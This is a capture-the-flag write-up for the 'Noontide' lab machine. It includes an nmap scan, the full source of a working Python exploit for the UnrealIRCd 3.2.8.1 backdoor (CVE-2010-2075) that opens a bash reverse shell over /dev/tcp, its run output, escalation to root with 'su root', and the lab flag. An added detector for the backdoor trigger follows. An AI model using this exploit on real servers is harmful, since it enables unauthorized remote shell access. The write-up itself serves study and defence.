Noontide
Port recognition with nmap
┌──(root@ghost)-[/home/ghost]
└─# nmap noontide.vuln -v -sV -p- --open --min-rate 5000
Starting Nmap 7.92 ( https://nmap.org ) at 2022-10-03 11:26 EDT
NSE: Loaded 45 scripts for scanning.
Initiating ARP Ping Scan at 11:26
Scanning noontide.vuln (10.0.2.32) [1 port]
Completed ARP Ping Scan at 11:26, 0.04s elapsed (1 total hosts)
Initiating SYN Stealth Scan at 11:26
Scanning noontide.vuln (10.0.2.32) [65535 ports]
Discovered open port 6697/tcp on 10.0.2.32
Discovered open port 8067/tcp on 10.0.2.32
Discovered open port 6667/tcp on 10.0.2.32
Completed SYN Stealth Scan at 11:26, 1.43s elapsed (65535 total ports)
Initiating Service scan at 11:26
Scanning 3 services on noontide.vuln (10.0.2.32)
Completed Service scan at 11:26, 1.00s elapsed (3 services on 1 host)
NSE: Script scanning 10.0.2.32.
Initiating NSE at 11:26
Completed NSE at 11:26, 0.01s elapsed
Initiating NSE at 11:26
Completed NSE at 11:26, 0.00s elapsed
Nmap scan report for noontide.vuln (10.0.2.32)
Host is up (0.000064s latency).
Not shown: 65532 closed tcp ports (reset)
PORT STATE SERVICE VERSION
6667/tcp open irc UnrealIRCd
6697/tcp open irc UnrealIRCd
8067/tcp open irc UnrealIRCd
MAC Address: 08:00:27:57:8A:66 (Oracle VirtualBox virtual NIC)
Service Info: Host: irc.foonet.com
Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 2.77 seconds
Raw packets sent: 65536 (2.884MB) | Rcvd: 65536 (2.621MB)
The nmap scan reports three open ports, and all of them appear to be IRC services.
┌──(root@ghost)-[/home/ghost]
└─# searchsploit UnrealIRCd
----------------------------------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------
Exploit Title | Path
----------------------------------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------
UnrealIRCd 3.2.8.1 - Backdoor Command Execution (Metasploit) | linux/remote/16922.rb
UnrealIRCd 3.2.8.1 - Local Configuration Stack Overflow | windows/dos/18011.txt
UnrealIRCd 3.2.8.1 - Remote Downloader/Execute | linux/remote/13853.pl
UnrealIRCd 3.x - Remote Denial of Service | windows/dos/27407.pl
----------------------------------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------
Shellcodes: No Results
┌──(root@ghost)-[/home/ghost]
└─# wget https://raw.githubusercontent.com/0bfxgh0st/cve-2010-2075/main/cve-2010-2075.py
--2022-10-03 11:33:18-- https://raw.githubusercontent.com/0bfxgh0st/cve-2010-2075/main/cve-2010-2075.py
Resolving raw.githubusercontent.com (raw.githubusercontent.com)... 185.199.108.133, 185.199.110.133, 185.199.111.133, ...
Connecting to raw.githubusercontent.com (raw.githubusercontent.com)|185.199.108.133|:443... connected.
HTTP request sent, awaiting response... 200 OK
Length: 852 [text/plain]
Saving to: ‘cve-2010-2075.py’
cve-2010-2075.py 100%[=========================================================================================================>] 852 --.-KB/s in 0s
2022-10-03 11:33:19 (117 MB/s) - ‘cve-2010-2075.py’ saved [852/852]
┌──(root@ghost)-[/home/ghost]
└─# cat cve-2010-2075.py
#!/bin/usr/python3
# CVE-2010-2075 UnrealIrcd 3.2.8.1 exploit rebuild by 0bfxgh0st*
import socket, sys, os, threading
def help():
    print ("CVE-2010-2075")
    print ("UnrealIrcd 3.2.8.1 exploit")
    print ("Usage python3 cve-2010-2075.py <attackerip> <attackerport> <ircserverip> <ircserverport>")
try:
    attacker_ip=sys.argv[1]
    attacker_port=sys.argv[2]
    irc_ip=sys.argv[3]
    irc_port=sys.argv[4]
    p = 'AB;bash -c "bash -i >& /dev/tcp/' + attacker_ip + '/' + attacker_port + ' 0>&1;"'
    ep = bytes(p, 'utf-8')
except:
    help()
    sys.exit()
def exploit():
    with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:
        s.connect((irc_ip,int(irc_port)))
        s.sendall(ep)
        data = s.recv(1024)
        print(data.decode('utf-8'))
def nc():
    print ("Exploiting...")
    os.system('nc -lvp ' + attacker_port)
c = threading.Thread(target=nc)
c.start()
exploit()
┌──(root@ghost)-[/home/ghost]
└─# python3 cve-2010-2075.py
CVE-2010-2075
UnrealIrcd 3.2.8.1 exploit
Usage python3 cve-2010-2075.py <attackerip> <attackerport> <ircserverip> <ircserverport>
┌──(root@ghost)-[/home/ghost]
└─# python3 cve-2010-2075.py 10.0.2.15 1337 noontide.vuln 6667
Exploiting...
listening on [any] 1337 ...
:irc.foonet.com NOTICE AUTH :*** Looking up your hostname...
connect to [10.0.2.15] from noontide.vuln [10.0.2.32] 41694
bash: cannot set terminal process group (370): Inappropriate ioctl for device
bash: no job control in this shell
server@noontide:~/irc/Unreal3.2$ su root
su root
Password: root
whoami
root
cat /root/proof.txt
ab28c8ca8da1b9ffc2d702ac54221105
Thanks for playing! - Felipe Winsnes (@whitecr0wz)
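
The same exchange seen from the detection side, as an added example that is not part of the original write-up or of the exploit author's code: it scans reassembled client-to-server data on the three IRC ports from the nmap output for lines that begin with the `AB` prefix the script above puts in front of its payload. The function name, finding labels and sample streams are constructed for illustration, and the streams are assumed to be cleartext.

```python
import re

# Ports on which the nmap scan above found UnrealIRCd listening.
IRC_PORTS = {6667, 6697, 8067}
# RFC 1459 message shape: optional ":prefix ", then a command that is
# either letters only or exactly three digits, followed by a space or end.
IRC_LINE = re.compile(rb"^(?::[^ ]+ +)?(?:[A-Za-z]+|[0-9]{3})(?: |$)")
# Prefix of the payload built by the script on this page. No RFC 1459
# command starts with "AB", so any client line that does is suspicious.
TRIGGER = b"AB"


def inspect_stream(dst_port, client_bytes):
    """Return (line_number, label, excerpt) findings for one reassembled
    client-to-server TCP stream (assumed cleartext)."""
    findings = []
    if dst_port not in IRC_PORTS:
        return findings
    for number, line in enumerate(re.split(rb"\r?\n", client_bytes), start=1):
        if not line:
            continue
        if line.startswith(TRIGGER):
            findings.append((number, "backdoor-trigger", line[:80]))
        elif not IRC_LINE.match(line):
            # Not the trigger, but not a well-formed IRC message either.
            findings.append((number, "malformed-irc", line[:80]))
    return findings


# Constructed sample streams (not captured traffic).
SAMPLES = [
    (6667, b"NICK alice\r\nUSER alice 0 * :Alice\r\nJOIN #ops\r\n"),
    (6667, b"AB;echo constructed-sample\n"),
    (8067, b"PING :irc.foonet.com\r\n\x00\x01garbage\r\n"),
    (80, b"AB;echo constructed-sample\n"),  # not an IRC port: ignored
]

if __name__ == "__main__":
    for port, stream in SAMPLES:
        for finding in inspect_stream(port, stream):
            print(port, finding)
```

In this session the session ended with `su root` accepting the password `root`, so upgrading UnrealIRCd alone would not have closed the path to root.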